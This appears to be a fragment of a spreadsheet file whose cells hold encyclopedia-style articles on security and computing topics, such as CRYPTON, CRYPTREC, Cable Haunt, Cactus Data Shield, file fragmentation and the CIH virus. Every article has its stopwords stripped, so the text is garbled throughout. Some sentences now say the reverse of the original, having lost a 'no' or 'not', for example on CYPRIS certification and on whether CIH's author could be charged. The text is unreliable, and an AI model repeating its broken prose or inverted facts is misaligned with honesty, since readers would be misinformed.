iii. wireless video door bell(vdb) camera units gets connected interned router allows communication ones mobile tablet communicate visitor. multi-apartment- this solution mass housing scenario. analog multi-apartment systems this analog providing tier security. multi-apartment system this tier security integration (building management system security systems like intrusion cctv building security cases even home automation. automatic operation when visitor presses outdoor panel pushbuttons, built-in camera connected image captured outdoors appears monitor screen. connection takes place automatically need activate equipment, essential elements video door entry. point, person inside building open door wish begin conversation, usually secret (cannot heard users facility). equipment also disconnects automatically time elapsed. video entry system whole runs voltage energy building’s trunk extra functions many terminals currently market ready accept extensions, making monitor small automatic function control centre. from here, user view several additional cameras installed access points, trigger light switches open second door, etc. video door entry systems access control video door entry systems commonly found integrated different access control systems. this means elements installed outdoor panel allow certain previously authorised users access premises. common means proximity cards, fingerprint readers, keypad secret numbers even bluetooth triggered mobile phone. adaptive equipment different equipment sets currently found market make accessible people different disabilities. thinking visually impaired, outdoor panel include information braille alongside pushbuttons, voice synthesiser also added indicates door opened. people hearing impairment, outdoor panel include screen icons signalling communication status: user calling, someone speaking indoors opening door. also type user mind, monitor fitted inductive loop, element interacts conventional hearing aids facilitate conversation outside without presence noticed users. also includes visual audio call alerts. also door phone courtesy phone speaking tube fermax intercom external links list mobile video intercoms references</t>
  </si>
  <si>
    <t>Video Content Protection System</t>
  </si>
  <si>
    <t>video content protection system (vcps) standard digital rights management, intended enforce protection dvd+r/+rw content related media. designed protect video recordings broadcast terrestrially broadcast flag used digital high-definition programming, expanded cover programming obtained ways, cable satellite delivery. this standard promoted philips included latest scsi mmc-6 specification. system makes three different classes encryption key, type stored media "disc block", stored player software, hardware device used play (and hence decrypt) media. phillips proposal there digital rights management scheme could possibly make current players obsolete. hewlett-packard philips "discussed trying develop content-protection system dvds, designed protect users burning 'protected' broadcasts.” once scheme used, normal players longer able read systems. this initiative trying prevent people uploading illegal videos recording shows illegally. words, would prevent recording shows movies played this scheme also built media replace non-drm encoded dvd+r discs. however, problems arise system. these discs players cost non-drm encoded ones. people want system costs universal systems work players forms dvds. another problem system format longer compatible players disc readers. this caused trouble users needed specific reader order play disc. this scheme usurped emergence buying movies online. thus far, scheme implemented. implemented would able become universal technology everyone use. references external links philips vcps page, includes vcps specification scsi multimedia command (mmc-6), includes vcps-specific commands</t>
  </si>
  <si>
    <t>CRYPTON</t>
  </si>
  <si>
    <t>cryptography, crypton symmetric block cipher submitted candidate advanced encryption standard (aes). efficient hardware implementations designed chae hoon future systems inc. crypton algorithm processes blocks bits form byte arrays. round transformation consists four steps: byte-wise substitution, column-wise permutation, column-to-row transposition finally addition. crypton uses rounds encryption process. algorithm's nature, decryption process made identical encryption process using different key. also process external links hardware design performance estimation 128-bit block cipher crypton eunjong hong, jai-hoon chung, chae hoon scan's entry crypton version originally submitted candidate nist crypton: 128-bit block cipher specification analysis (version 0.5) chae hoon lim, hwang crypton: 128-bit block cipher specification analysis (version 1.0) chae hoon lim, hwang weak keys crypton johan borst, 1998. response call comments candidates. retrieved 2014-01-23. crypton delphi implementation</t>
  </si>
  <si>
    <t>CIKS-1</t>
  </si>
  <si>
    <t>cryptography, ciks-1 block cipher designed 2002 a.a. moldovyan n.a. moldovyan. like predecessor, spectr-h64, relies heavily permutations bits, better suited implementation hardware software. algorithm block size bits. uses round structure half block determines transformation half round, similar feistel cipher rc5. round also undergoes transformation dependent data. ciks-1 uses four types operations: data-dependent permutations, fixed permutations, xors, addition designers ciks-1 specify schedule cipher, uses total size bits. kidney, heys, norvell showed round keys hamming weight relatively weak, keys chosen carefully. researchers also proposed differential cryptanalysis ciks-1 uses chosen plaintexts. references kidney, heys, norvell (november 2003). weight based attack ciks-1 block cipher" (pdf/postscript). retrieved january 2007. {{cite journal}}: cite journal requires |journal= (help)cs1 maint: multiple names: authors list (link) kidney; heys; norvell (2004). differential attack ciks-1 block cipher" (pdf/postscript). retrieved january 2007. {{cite journal}}: cite journal requires |journal= (help) further reading changhoon lee; deukjo hong; sungjae lee; sangjin lee; hyungjin yang; jongin (2002). chosen plaintext linear attack block cipher ciks-1". robert deng; sihan qing; feng bao; jianying zhou (eds.). information communications security: international conference, icics 2002, singapore, december 9–12, 2002 proceedings. springer. 456–468. isbn 9783540001645.</t>
  </si>
  <si>
    <t>CRYPTREC</t>
  </si>
  <si>
    <t>cryptrec cryptography research evaluation committees japanese government evaluate recommend cryptographic techniques government industrial use. comparable many respects european union's nessie project advanced encryption standard process national institute standards technology u.s. comparison nessie there overlap, conflict, nessie selections cryptrec draft recommendations. both efforts include best cryptographers world therefore conflicts selections recommendations examined care. instance, cryptrec recommends several block ciphers nessie selected none, cryptrec obliged terms reference take account existing standards practices, nessie not. similar differences terms reference account cryptrec recommending least stream cipher, rc4, nessie report specifically said notable selected considered. widely used ssl/tls protocols; nevertheless, cryptrec recommended used 128-bit keys. essentially consideration cryptrec's inclusion 160-bit message digest algorithms, despite suggestion avoided system designs. also, cryptrec unusually careful examine variants modifications techniques, least discuss care resulted particularly detailed recommendations regarding them. background sponsors cryptrec includes members japanese academia, industry, government. started 2000 combining efforts several agencies investigating methods techniques implementing 'e-government' japan. presently, sponsored ministry economy trade industry, ministry public management, home affairs post telecommunications, telecommunications advancement organization, information-technology promotion agency. responsibilities also organization provides technical evaluation recommendations concerning regulations implement japanese laws. examples include electronic signatures certification services (law fy2000, taking effect april 2001), basic formulation advanced information telecommunications network society 2000 (law fy2000), public individual certification december 2002. furthermore, cryptec responsibilities regard japanese contribution iso/iec 1/sc27 standardization effort. selection first release 2003, many japanese ciphers selected "e-government recommended ciphers list": cipherunicorn-e (nec), hierocrypt-l1 (toshiba), misty1 (mitsubishi electric) block ciphers, camellia (nippon telegraph telephone, mitsubishi electric), cipherunicorn-a (nec), hierocrypt-3 (toshiba), sc2000 (fujitsu) block ciphers, finally mugi multi-s01 (hitachi) stream ciphers. revised release 2013, list divided three: "e-government recommended ciphers list", "candidate recommended ciphers list", "monitored ciphers list". most japanese ciphers listed previous list (except camellia) moved "recommended ciphers list" "candidate recommended ciphers list". there several proposals, clefia (sony) block cipher well kcipher-2 (kddi) enocoro-128v2 (hitachi) stream ciphers. however, kcipher-2 listed "e-government recommended ciphers list". reason japanese ciphers selected "recommended ciphers" ciphers necessarily unsafe, ciphers widely used commercial products, open-source projects, governmental systems, international standards. there possibility ciphers listed "candidate recommended ciphers list" moved "e-government recommended ciphers list" utilized widely. addition, sha-1 listed "monitored ciphers list". these unsafe permitted remain compatible systems. after revision 2013, several updates addition chacha20-poly1305, eddsa sha-3, move triple monitored list, deletion rc4, etc. cryptrec ciphers list march 2022 e-government recommended ciphers list public ciphers signature ecdsa rsa-pss rsassa-pkcs1-v1_5 confidentiality rsa-oaep exchange ecdh symmetric ciphers 64-bit block ciphers 128-bit block ciphers camellia stream ciphers kcipher-2 hash functions sha-256 sha-384 sha-512 modes operation encryption modes authenticated encryption modes message authentication codes cmac hmac authenticated encryption entity authentication iso/iec 9798-2 iso/iec 9798-3 candidate recommended ciphers list public ciphers signature eddsa confidentiality exchange psec-kem symmetric ciphers 64-bit block ciphers cipherunicorn-e hierocrypt-l1 misty1 128-bit block ciphers cipherunicorn-a clefia hierocrypt-3 sc2000 stream ciphers mugi enocoro-128v2 multi-s01 hash functions sha-512/256 sha3-256 sha3-384 sha3-512 shake128 shake256 modes operation encryption modes authenticated encryption modes message authentication codes pc-mac-aes authenticated encryption chacha20-poly1305 entity authentication iso/iec 9798-4 monitored ciphers list public ciphers signature confidentiality rsaes-pkcs1-v1_5 exchange symmetric ciphers 64-bit block ciphers 3-key triple 128-bit block ciphers stream ciphers hash functions ripemd-160 sha-1 modes operation encryption modes authenticated encryption modes message authentication codes cbc-mac authenticated encryption entity authentication references external links official website list ciphers referred procurement e-government system (cryptrec ciphers list) japanese)</t>
  </si>
  <si>
    <t>Version vector</t>
  </si>
  <si>
    <t>version vector mechanism tracking changes data distributed system, multiple agents might update data different times. version vector allows participants determine update preceded another (happened-before), followed updates happened concurrently (and therefore might conflict other). way, version vectors enable causality tracking among data replicas basic mechanism optimistic replication. mathematical terms, version vector generates preorder tracks events precede, therefore influence, later updates. version vectors maintain state identical vector clock, update rules differ slightly; example, replicas either experience local updates (e.g., user editing file local node), synchronize another replica: initially vector counters zero. each time replica experiences local update event, increments counter vector one. each time replicas synchronize, elements copy vector maximum element across counters: {\displaystyle v_{a}[x]=v_{b}[x]=\max(v_{a}[x],v_{b}[x])} after synchronization, replicas identical version vectors.pairs replicas, compared inspecting version vectors determined either: identical {\displaystyle a=b} concurrent {\displaystyle a\parallel ordered {\displaystyle a&lt;b} {\displaystyle b&lt;a} ordered relation defined vector {\displaystyle a&lt;b} every element {\displaystyle v_{a}} less equal corresponding element {\displaystyle v_{b}} least elements strictly less than. neither {\displaystyle a&lt;b} {\displaystyle b&lt;a} vectors identical, vectors must concurrent. version vectors variants used track updates many distributed file systems, coda (file system) ficus, main data structure behind optimistic replication. other mechanisms hash histories avoid counters keeping hashes updated version comparing sets inclusion. however mechanism give probabilistic guarantees. concise version vectors allow significant space savings handling multiple replicated items, directory structures filesystems. version stamps allow tracking variable number replicas resort counters. this mechanism depict scalability problems settings, replaced interval tree clocks. interval tree clocks generalize version vectors vector clocks allows dynamic numbers replicas/processes. bounded version vectors allow bounded implementation, bounded size counters, long replica pairs atomically synchronized. dotted version vectors address scalability small servers mediating replica access large number concurrent clients. references external links logical clocks easy (compares causal histories, vector clocks version vectors)</t>
  </si>
  <si>
    <t>CWC mode</t>
  </si>
  <si>
    <t>cryptography, mode (carter–wegman mode) aead block cipher mode operation provides encryption built-in message integrity, similar modes. combines mode encryption efficient polynomial carter–wegman designed tadayoshi kohno, john viega doug whiting. mode submitted nist standardization, opted similar mode instead. references external links mode home page cwc: high-performance conventional authenticated encryption mode cryptology eprint implementation aes.</t>
  </si>
  <si>
    <t>CYPRIS (microchip)</t>
  </si>
  <si>
    <t>cypris (cryptographic risc microprocessor) cryptographic processor developed lockheed martin advanced technology laboratories. device designed implement encryption algorithms similar intent sierra crypto modules. however, principal references date back late 1990s appear cypris ever earned nsa's type certification, without could used protect classified government traffic. according manufacturer presentation, cypris designed address cryptographic requirements military software radios wireless systems. designed contract, cypris optimized implement variety legacy comsec transec algorithms enabling field upgrades emerging infosec algorithms. cypris contains high performance risc core, reconfigurable hardware unit, suite programmable automatic system check features. unprogrammed, cypris unclassified, cci, exportable device; programmed assumes classification software. over core cryptoalgorithms developed cypris. references</t>
  </si>
  <si>
    <t>Veritas Cluster Server</t>
  </si>
  <si>
    <t>veritas cluster server (rebranded veritas infoscale availability also known also sold bundled sfha product) high-availability cluster software unix, linux microsoft windows computer systems, created veritas technologies. provides application cluster capabilities systems running applications, including databases, network file sharing, electronic commerce websites. description high-availability clusters (hac) improve application availability failing switching group systems—as opposed high-performance clusters, improve application performance running multiple systems simultaneously. most veritas cluster server implementations attempt build availability cluster, eliminating single points failure making redundant components like multiple network cards, storage area networks addition vcs. similar products include fujitsu primecluster, powerha system mirror, serviceguard, tivoli system automation multiplatforms mp), linux-ha, opensaf, microsoft cluster server (mscs), expresscluster, cluster suite, steeleye lifekeeper cluster. products industry provides high availability disaster recovery across major operating systems supporting major application/replication technologies box. mostly user-level clustering software; processes normal system processes systems operates special access operating system kernel functions host systems. however, interconnect (heartbeat) technology used proprietary layer ethernet-based protocol kernel space using kernel modules. group membership protocol runs interconnect heartbeat protocol also implemented kernel. case split brain, 'fencing' module work arbitration data protection. fencing implemented kernel module. basic architecture includes latency transport global membership services atomic broadcast protocol high availability daemon cluster agents. lies bottom architecture acts conduit underlying network. receives information transmits across intended participant nodes. while module node interacts every node cluster, communication always individual nodes. case certain information needs transmitted across cluster nodes assuming nodes cluster, different packets sent across targeted individual machine interconnects. determines machines part cluster minimum number nodes need present working form cluster minimum number called seed number acts abstract layer upon cluster services plugged each cluster services need register assigned predetermined unique port name single alphabet). client server component. client component used send information using layer registers server component port "a". registers port "h". server portion interacts modules cluster nodes maintain membership information respect different ports. membership information conveys cluster modules corresponding ports example port port different cluster nodes good shape able communicate intended manner other. layer place actual high availability applications provided. this place applications actually plug high availability framework. registers port "h". module running node communicates modules running cluster nodes order ensure cluster nodes information respect cluster configuration status. order applications able plug high availability framework, needs cluster agent software. cluster agent softwares generic specific type application. example, oracle utilize high availability framework vcs, needs agent software. base generic cluster software know different applications start, stop, monitor, clean etc. this information needs coded agent software. agent software thought translator application framework. example, needs stop oracle database, default, know stop however, oracle agent running oracle agent stop database definition, agent issue commands specific version configuration monitor stop status. important files cluster configuration information kept /etc/llttab, /etc/llthostsgab /etc/gabtabhad (vcs) /etc/vrtsvcs/conf/config/main.cf, /etc/vrtsvcs/conf/config/types.cf, /etc/vrtsvcs/conf/sysnameveritas cluster server windows available standalone product. also sold bundled storage foundation storage foundation windows; veritas cluster server aix, hp-ux, linux, solaris supplied standalone product. veritas cluster server product includes management console, multi-cluster management software automates disaster recovery across data centers. release history veritas cluster server (end support july 2011) veritas cluster server (end support august 2014) veritas cluster serv (end support november 2016) veritas cluster server 6.0, released august 2012 (2012-08-16) veritas infoscale availability (formerly veritas cluster server) also high-availability cluster solaris cluster computer cluster symantec operations readiness tools (sort) references external links veritas cluster server documentation1 veritas cluster server agent finder downloads veritas cluster server homepage veritas cluster server management console symantec operations readiness tools (sort)</t>
  </si>
  <si>
    <t>Cable Haunt</t>
  </si>
  <si>
    <t>cable haunt code name assigned represent separate vulnerabilities affect many cable modems around world 2020. these vulnerabilities allow attacker obtain external access cable modem perform number activities intended modify operation monitor data passing cable modem.the problem lies broadcom system-on-a-chip, used many cable modems, specifically software running spectrum analyzer, protects power surges cable signal. exposes unsecured websockets interface cable haunt reach using javascript victim's browser.modems impacted cable haunt give remote attackers full (kernel level) control cable modem, allowing potentially: modify install firmware modem change modem's server redirect outbound traffic enlist modem distributed denial service attack (ddos) modify modem address serial number disable patching updating functions man-in-the-middle attack skim datamost home small businesses obtain cable modems directly internet service providers (isps). situations isps control patching firmware updating processes, subscribers must wait cable providers receive updated firmware manufacturers push individual modem. cable companies initially slow respond threat, actively working updates customers.on january 2020 schrock innovations, computer repair company based lincoln, nebraska, released executable programs windows systems systems based lyrebirds' original javascript. these programs allowed less technically advanced users ability test connections. users programs instructed contact modem vulnerable order increase public pressure patches created order address vulnerability. references further reading dunn, john january 2020). "'cable haunt' vulnerability exposes million cable modem users". naked security sophos. retrieved april 2020. nichols, shaun january 2020). "hundreds millions broadcom-based cable modems risk remote hijacking, eggheads fear". theregister.co.uk. retrieved april 2020. cimpanu, catalin january 2020). "hundreds millions cable modems vulnerable cable haunt vulnerability". zdnet. retrieved june 2020.</t>
  </si>
  <si>
    <t>Cache poisoning</t>
  </si>
  <si>
    <t>cache poisoning refers computer security vulnerability invalid entries placed cache, assumed valid later used. common varieties cache poisoning cache poisoning. cache poisoning involves poisoning caches. attacks other, specific, caches also exist. references</t>
  </si>
  <si>
    <t>Cactus Data Shield</t>
  </si>
  <si>
    <t>cactus data shield (cds) form cd/dvd copy protection audio compact discs developed israeli company midbar technologies. used extensively (subsequently acquired sony music) subsidiaries. relies basically components: erroneous disc navigation data corruption. september 2006, macrovision's copy protection products, including cds, quietly disappeared website. december 2006 issue billboard announced decided abandon copy control worldwide. erroneous disc navigation discs contain initial audio session, similar unprotected disc. addition disc contains second (data) session software player configured auto-play lower-quality, compressed version audio play. second session disc causes cd/dvd players hang, typically players (allegedly using cd-rom drive mechanisms) capable players understand second data session. second session circumvented another method, either place masking tape around disc near edge, mark strip next edge permanent marker. because multi-session disc, method hide second session, leaving first audio session visible. older windows operating systems, disabling auto-play either loading disc, permanently, stop software player launching required access audio session drives recognise sessions. newer versions windows since vista fixed auto-run vulnerability thus user needs simply choose software. side effect second session containing music compressed form maximum length music disc reduced, approximately minutes. remaining space compressed audio (and player software files though small comparison). data corruption second aspect cactus data shield careful corruption audio data, described midbar patent "prevention disk piracy" patent number 6,425,098. usual patents freely available patent office site. summary method described detects mastering waveform music comes close straight line least size "frame" (information disc encoded blocks sectors, sector contains frames music cdda disc) marks frame replaces erroneous data violates t.sub.max (according 908) transition high data levels this results (digital value) error additional data corruption described patent includes adding duplicate entry (table contents) audio session onto second (data) session. some older drives would second session erroneous values (such time track type) able copy play these. another method change start time lead-out (end disc) incorrect time toc. other patent processes include changing time channel holds, speeds flows backwards. interpretation corrupted data old-fashioned player reading subcode correctly sees missing audio frame interpolates missing information cannot correct using information neighbouring frames. because missing frames occur points waveform nearly straight line anyway, interpolation accurate generally transparent user. what happens computer drives specific hardware firmware drive question, assuming least seen past second data session play audio session. some older drives simply ignore subcode "play" data frames, resulting loud audio glitches. some overwhelmed number errors needing correction interpolation, drives output occasional glitches. ripping drive's minimum speed reduce eliminate effect. majority drives successfully correct interpolate missing audio even maximum ripping speeds. impact techniques used cactus data shield discs mean discs conform book compact disc digital audio standards, therefore bear redbook logo. reason referred cdda (compact disc digital audio). there also ethical/legal issues surrounding selling discs reliably play players, added errors make disc easily affected accumulated lifetime damage, actual audio data omitted. earliest released utilizing copy-protection white lilies island natalie imbruglia, used cactus data shield released november 2001. with minor mention small print case, album subject many complaints consumers found could play non-windows computers, games consoles devices. cases included xbox repeatedly playing small portion track playstation users could play track track later provided uncorrupted copies consumers. only initial european release copy-protected. controversy macrovision made number controversial claims software subsequently proven false: time, widely circulated reports macrovision software behaved ways indistinguishable computer virus also found false, notion software provided substantial copy-protection.macrovision software existed principally versions: "cds-200" subsequent "cds-300." versions first versions system cds-100 cds-200. later, cds-300 system features active software protection introduced. also copy control references external links macrovision website</t>
  </si>
  <si>
    <t>Caja project</t>
  </si>
  <si>
    <t>caja (pronounced kah-hah) google project sanitizing third party html, javascript. january 2021, google archived project known vulnerabilities lack maintenance keep latest security research, recommending instead closure toolkit.caja designed google research scientist mark miller 2008 javascript implementation "virtual iframes" based principles object-capabilities. would take javascript (technically, ecmascript strict mode code), html, input rewrite safe subset html css, plus single javascript function free variables. that means function could modify object, given reference object host page. instead giving direct references objects, host page typically gives references wrappers sanitize html, proxy urls, prevent redirecting page; allowed caja prevent certain phishing cross-site scripting attacks, prevent downloading malware. also, since rewritten programs frame, host page could allow program export object reference another program; inter-frame communication simply method invocation. word "caja" spanish "box" "safe" bank), idea caja could safely contain javascript programs well capabilities-based javascript. caja used google google apps script products. 2008 myspace yahoo! deployed early version caja. also joe-e, object-capability subset java references external links caja project home page caja project source code caja playground caja draft specification: "safe active content sanitized javascript", mark miller, mike samuel, laurie, ihab awad, mike stay yahoo!/google caja javascript sandbox</t>
  </si>
  <si>
    <t>Cameyo</t>
  </si>
  <si>
    <t>cameyo application virtualization product. aims virtualize windows applications machines html5 browsers. reported easy use, light weight, compatible wide variety applications. company’s site includes library ready-to-use virtualized free open-source virtual applications downloaded browser. cameyo free edition home small businesses machines. history cameyo application virtualization product launched 2010, since then, undergone least major several minor versions yearly improve quality functioning application. cameyo claims pioneers linking virtualization cloud storage systems html5. added features recently, making possible applications operating systems windows, like linux android. since 2014, cameyo launched another angle operation: possible virtualized windows applications browsers directly, application running tab. operations once cameyo packaged application, output standalone contains virtualization engine original software’s files registry. directly target windows machines. since self-contained, require agent pre-installed target machines. also uploaded cameyo server, making possible virtual applications browser. virtualizing applications cameyo portable virtual application need installed computer. deleted virtualization completed single file without leaving traces registry. cameyo essentially reduces files, folders, registry items, binaries application needs virtualized single executable file without installation single file storage device computer. this single executable file carried device uploaded cloud storage system. this operation carried either downloading cameyo computer, online system uploading system file required application. however, advisable download cameyo computer provides better sequencing process. following highlights procedure: application virtualized needs installed opening cameyo. previously installed, uninstalled reinstalled cameyo capture mode. cameyo takes snapshots computer installation desired application, compares changes snapshots, hence, captures application makes changes registry system files. both steps taking snapshots requires time, depending upon speed computer, size application, state registry computer cameyo makes possible virtualize multiple applications time executable file close background applications, updating windows anti-virus programs, extra material captured cameyo, thus making application bulky once application virtualized, saved defined destination folder accessed, opened, copied portable storage device computersthere also option cameyo editing virtualized applications case changes need made regarding settings, name, registry items application. running applications browsers cameyo recently made possible virtualized applications directly browsers, hence, claiming make software discovery usage easier. through operation, longer need even carry application, directly accessed website company. company provides large variety open access free software applications pre-virtualized direct use. however, personal applications computer cloud storage device also uploaded onto company server accessed browser. each application runs separate tab. virtualizing applications, browser applications also operating systems windows. function, create free account company, link dropbox cloud storage system account order access personal files applications running browser. references</t>
  </si>
  <si>
    <t>Can't extend</t>
  </si>
  <si>
    <t>computing, file system fragmentation, sometimes called file system aging, tendency file system contents files non-continuously allow in-place modification contents. special case data fragmentation. file system fragmentation negatively impacts seek time spinning storage media, known hinder throughput. fragmentation remedied re-organizing files free space back contiguous areas, process called defragmentation. solid-state drives physically seek, non-sequential data access hundreds times faster moving drives', making fragmentation non-issue. recommended defragment solid-state storage, prematurely wear drives unnecessary write–erase operations. causes when file system first initialized partition, contains small internal structures otherwise contiguous block empty space. this means file system able place newly created files anywhere partition. time creation, files laid near-optimally. when operating system applications installed archives unpacked, separate files occurring sequentially related files positioned close other. existing files deleted truncated, regions free space created. when existing files appended often impossible resume write exactly file used end, another file already allocated there; thus, fragment allocated. time goes factors continuously present, free space well frequently appended files tend fragment more. shorter regions free space also mean file system longer able allocate files contiguously, break fragments. this especially true file system becomes full large contiguous regions free space unavailable. example following example simplification otherwise complicated subject. consider following scenario: disk five files, named saved continuously sequentially order. each file using blocks space. (here, block size unimportant.) remainder disk space free block. thus, additional files created saved file file deleted, second region blocks free space created, disk becomes fragmented. empty space simply left there, marked available later use, used needed. file system could defragment disk immediately deletion, would incur severe performance penalty unpredictable times. now, file called requires seven blocks space, placed first seven blocks newly freed space formerly holding file three blocks following remain available. another file called needs three blocks, added, could occupy space subsequently needs expanded, since space immediately following occupied, three options file system: adding block somewhere else indicating second extent moving files expansion elsewhere, allow remain contiguous moving file contiguous file new, larger sizethe second option probably impractical performance reasons, third file large. third option impossible single contiguous free space large enough hold file. thus usual practice simply create extent somewhere else chain extent onto one. material added file would part extent. much material room available last extent, another extent would created, eventually file system free segments many places files spread many extents. access time files files) become excessively long. necessity some early file systems unable fragment files. example acorn file system used micro. inability fragment files, error message can't extend would times appear, user would often unable save file even disk adequate space used simple disk structure files disk located length starting sector. this meant files exist continuous block sectors fragmentation possible. using example table above, attempt expand file step five would failed system can't extend error message. regardless much free space might remain disk total, available extend data file. standards error handling time primitive case programs squeezed limited memory micro could rarely afford waste space attempting handle errors gracefully. instead, user would find dumped back command prompt can't extend message data appended file would lost. problem could solved simply checking free space disk beforehand, either. while free space disk exist, size largest contiguous block free space immediately apparent without analyzing numbers presented disk catalog would escape user's notice. addition, almost users previously used cassette file storage, suffer error. upgrade floppy disk system expensive upgrade, shock upgrade might without warning cause data loss. types file system fragmentation occur several levels: fragmentation within individual files free space fragmentation decrease locality reference separate, related files file fragmentation individual file fragmentation occurs single file broken multiple pieces (called extents extent-based file systems). while disk file systems attempt keep individual files contiguous, often possible without significant performance penalties. file system check defragmentation tools typically account file fragmentation "fragmentation percentage" statistic. free space fragmentation free (unallocated) space fragmentation occurs several unused areas file system files metadata written unwanted free space fragmentation generally caused deletion truncation files, file systems also intentionally insert fragments ("bubbles") free space order facilitate extending nearby files (see preventing fragmentation below). file scattering file segmentation, also called related-file fragmentation, application-level (file) fragmentation, refers lack locality reference (within storing medium) related files (see file sequence detail). unlike previous types fragmentation, file scattering much vague concept, heavily depends access pattern specific applications. this also makes objectively measuring estimating difficult. however, arguably, critical type fragmentation, studies found frequently accessed files tend small compared available disk throughput second.to avoid related file fragmentation improve locality reference case called file contiguity), assumptions active observations operation applications made. frequent assumption made worthwhile keep smaller files within single directory together, natural file system order. while often reasonable assumption, always hold. example, application might read several different files, perhaps different directories, exactly order written. thus, file system simply orders writes successively, might work faster given application. negative consequences file system fragmentation problematic consumer-grade hard disk drives increasing disparity sequential access speed rotational latency (and lesser extent seek time) file systems usually placed. thus, fragmentation important problem file system research design. containment fragmentation depends on-disk format file system, also heavily implementation. file system fragmentation less performance impact upon solid-state drives, mechanical seek time involved. however, file system needs store additional metadata non-contiguous part file. each piece metadata occupies space requires processing power processor time. maximum fragmentation limit reached, write requests fail.in simple file system benchmarks, fragmentation factor often omitted, realistic aging fragmentation difficult model. rather, simplicity comparison, file system benchmarks often empty file systems. thus, results vary heavily real-life access patterns. mitigation several techniques developed fight fragmentation. they usually classified categories: preemptive retroactive. difficulty predicting access patterns techniques often heuristic nature degrade performance unexpected workloads. preventing fragmentation preemptive techniques attempt keep fragmentation minimum time data written disk. simplest appending data existing fragment place possible, instead allocating blocks fragment. many today's file systems attempt preallocate longer chunks, chunks different free space fragments, called extents files actively appended this largely avoids file fragmentation several files concurrently appended thus avoiding becoming excessively intertwined.if final size file subject modification known, storage entire file preallocated. example, microsoft windows swap file (page file) resized dynamically normal operation, therefore become highly fragmented. this prevented specifying page file minimum maximum sizes, effectively preallocating entire file. bittorrent peer-to-peer filesharing applications limit fragmentation preallocating full space needed file initiating downloads.a relatively recent technique delayed allocation xfs, hfs+ zfs; technique also called allocate-on-flush reiser4 ext4. when file system written file system blocks reserved, locations specific files laid yet. later, file system forced flush changes result memory pressure transaction commit, allocator much better knowledge files' characteristics. most file systems approach flush files single directory contiguously. assuming multiple reads single directory common, locality reference improved. reiser4 also orders layout files according directory hash table, files accessed natural file system order dictated readdir), always read sequentially. defragmentation retroactive techniques attempt reduce fragmentation, negative effects fragmentation, occurred. many file systems provide defragmentation tools, attempt reorder fragments files, sometimes also decrease scattering (i.e. improve contiguity, locality reference) keeping either smaller files directories, directory trees, even file sequences close disk. plus file system transparently defragments files less size broken fragments, file opened.the obsolete commodore amiga smart file system (sfs) defragmented filesystem use. defragmentation process almost completely stateless (apart location working on), stopped started instantly. during defragmentation data integrity ensured metadata normal data. also list defragmentation software file fragmentation disk compression notes references further reading</t>
  </si>
  <si>
    <t>CSipSimple</t>
  </si>
  <si>
    <t>csipsimple voice internet protocol (voip) application google android operating system using session initiation protocol (sip). open source free software released gpl-3.0-or-later license. project abandoned october 2017. 2019, csip longer active website longer available play store. users csip already installed removed device. details relies pjsip stack features provided stack.the features software are: multi-codec support: speex (narrow-band/wide-band), g.711 (u-law/a-law), gsm, ilbc, g.729 (support dropped r2180, need licensed g729 plug-in), g.722, (narrow-band), isac, silk (narrow-band/wide-band/ultra wide-band) (support dropped 2014) plug-in adds support codec2, g.726, g.722.1 opus plug-in adds video calling vp8, h264 h263-1998 codecs multi-account support: accounts activated time native audio driver traversal using stun, turn integration android operating system filters rewriting rules security encryption srtp, zrtp simple messaging third-party applications available packet loss concealment (plc) using pjsip support ipv6 hardware, android version, parts connections involved handle ipv6, csipsimple used make direct end-to-end ipv6-to-ipv6 calls. reviews 2011, reviews favourable. also comparison voip software list software mobile voip references</t>
  </si>
  <si>
    <t>Vkernel</t>
  </si>
  <si>
    <t>virtual kernel architecture (vkernel) operating system virtualisation paradigm kernel code compiled user space, example, ease debugging various kernel-level components, addition general-purpose virtualisation compartmentalisation system resources. used dragonfly vkernel implementation since dragonfly 1.7, first revealed september 2006 (2006-09), first released stable branch dragonfly january 2007 (2007-01). long-term goal, addition easing kernel development, make easier support internet-connected computer clusters without compromising local security. similar concepts exist operating systems well; linux, similar virtualisation concept known user-mode linux; whereas netbsd since summer 2007, initial focus rump kernel infrastructure.the virtual kernel concept nearly exact opposite unikernel concept vkernel, kernel components userspace ease kernel development debugging, supported regular operating system kernel; whereas unikernel, userspace-level components directly kernel space extra performance, supported baremetal hardware hardware virtualisation stack. however, vkernels unikernels used similar tasks well, example, self-contain software virtualised environment overhead. fact, netbsd's rump kernel, originally focus running kernel components userspace, since shifted unikernel space well (going anykernel moniker supporting paradigms). vkernel concept different freebsd jail jail meant resource isolation, cannot used develop test kernel functionality userland, jail sharing kernel. (dragonfly, however, still freebsd jail support well.) dragonfly, vkernel thought first-class computer architecture, comparable i386 amd64, and, according matthew dillon circa 2007, used starting point porting dragonfly architectures. dragonfly's vkernel supported host kernel system calls help manage virtual memory address space (vmspace) vmspace_create() al., well extensions several existing system calls like mmap's madvise mcontrol. also user-mode linux rump kernel references external links vkernel(7) man-page dragonfly virtual kernels</t>
  </si>
  <si>
    <t>CIH (computer virus)</t>
  </si>
  <si>
    <t>cih, also known chernobyl spacefiller, microsoft windows computer virus first emerged 1998. payload highly destructive vulnerable systems, overwriting critical information infected system drives and, cases, destroying system bios. chen ing-hau (陳盈豪, pinyin: chén yíngháo), student tatung university taiwan, created virus. believed infected sixty million computers internationally, resulting estimated us$1 billion commercial damages.chen claimed written virus challenge bold claims antiviral efficiency antivirus software developers. chen stated classmates tatung university spread virus, apologized school made antivirus program available public download. weng shi-hao (翁世豪), student tamkang university, co-authored antivirus program. prosecutors taiwan could charge chen time victims came forward lawsuit. nevertheless, events computer crime legislation taiwan.the name "chernobyl virus" coined sometime virus already well known refers complete coincidence payload trigger date variants virus (actually virus creation date 1998, trigger exactly year later) chernobyl disaster, happened soviet union april 1986. name "spacefiller" introduced viruses write code infected file, infected files detectable file size increases. contrast, looks gaps existing program code, writes code, preventing increase file size; way, virus avoids detection. history virus first emerged 1998. march 1999, several thousand aptivas shipped virus, month virus would trigger. july 1999, copies remote administration tool back orifice 2000 given attendees discovered organizers infected cih. december 1999, yamaha shipped software update cd-r400 drives infected virus. july 1998, demo version first-person shooter game infected mirror sites.cih's dual payload delivered first time april 1999, damage occurring asia. filled first 1024 host's boot drive zeros attacked certain types bios. both payloads served render host computer inoperable, ordinary users virus essentially destroyed technically, however, possible replace bios chip, methods recovering hard disk data emerged later. today, widespread was, awareness threat fact affects older windows (95, operating systems. virus made another comeback 2001 variant loveletter worm file contained dropper routine virus circulated around internet, guise nude picture jennifer lopez. modified version virus called cih.1106 discovered december 2002, widespread, affects windows windows 98-based systems. virus specifics spreads portable executable file format windows 9x-based operating systems, windows spread windows nt-based operating systems 